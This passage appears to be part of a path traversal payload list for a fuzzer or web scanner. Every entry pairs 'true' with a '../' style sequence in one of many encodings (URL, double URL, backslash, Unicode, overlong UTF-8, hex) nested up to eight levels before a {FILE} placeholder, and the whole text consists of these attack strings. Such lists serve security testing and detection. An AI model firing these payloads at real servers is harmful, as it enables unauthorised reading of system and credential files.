"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,\\../{FILE}",
"true,\\../\\../{FILE}",
"true,\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,/..\\{FILE}",
"true,/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,.../{FILE}",
"true,.../.../{FILE}",
"true,.../.../.../{FILE}",
"true,.../.../.../.../{FILE}",
"true,.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../.../{FILE}",
"true,...\\{FILE}",
"true,...\\...\\{FILE}",
"true,...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,..../{FILE}",
"true,..../..../{FILE}",
"true,..../..../..../{FILE}",
"true,..../..../..../..../{FILE}",
"true,..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../..../{FILE}",
"true,....\\{FILE}",
"true,....\\....\\{FILE}",
"true,....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,........................................................................../{FILE}",
"true,........................................................................../../{FILE}",
"true,........................................................................../../../{FILE}",
"true,........................................................................../../../../{FILE}",
"true,........................................................................../../../../../{FILE}",
"true,........................................................................../../../../../../{FILE}",
"true,........................................................................../../../../../../../{FILE}",
"true,........................................................................../../../../../../../../{FILE}",
"true,..........................................................................\\{FILE}",
"true,..........................................................................\\..\\{FILE}",
"true,..........................................................................\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%u2215{FILE}",
"true,..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,..%u2216{FILE}",
"true,..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uF025{FILE}",
"true,..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,..0x2f{FILE}",
"true,..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,..0x5c{FILE}",
"true,..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,///%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,\\\\\\%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
